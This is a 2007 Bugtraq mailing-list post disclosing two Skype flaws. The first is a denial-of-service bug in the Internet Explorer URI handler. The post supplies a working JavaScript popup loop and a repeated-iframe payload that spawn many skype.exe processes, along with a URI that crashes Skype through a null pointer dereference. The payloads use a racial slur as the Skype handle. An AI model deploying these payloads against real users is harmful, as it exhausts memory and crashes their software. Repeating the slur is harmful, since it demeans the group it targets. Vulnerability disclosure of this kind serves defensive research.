Skype DoS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Skype DoS
From: mail@xxxxxx
Date: 25 Nov 2007 19:50:55 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

1. Skype and Internet Explorer uri handler mechanism memory resources 
consumption bug:

<script>
for (var x = 1; x <= 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close ();
}
</script>

This will invoke many skype.exe processes and as they are not closed - much 
memory will be consumed. Such script will be blocked by popup blocker, so it is 
possible to do it other way:

<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
... I've used about megabyte of such crap
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>

Tested on IE7, WinXP SP2 and skype 3.6.0.216

2. Unexploitable Skype null pointer dereference:

skype:?voicemail

To trigger the bug a right mouse button must be clicked, or menu button 
selected. Skype should crash :)

Found here: http://www.critical.lt/?opinions/show/1433
credits: Critical Security

Prev by Date: two bytehoard 2.1 bugs
Next by Date: PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability
Previous by thread: two bytehoard 2.1 bugs
Next by thread: PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability
Index(es):
- Date
- Thread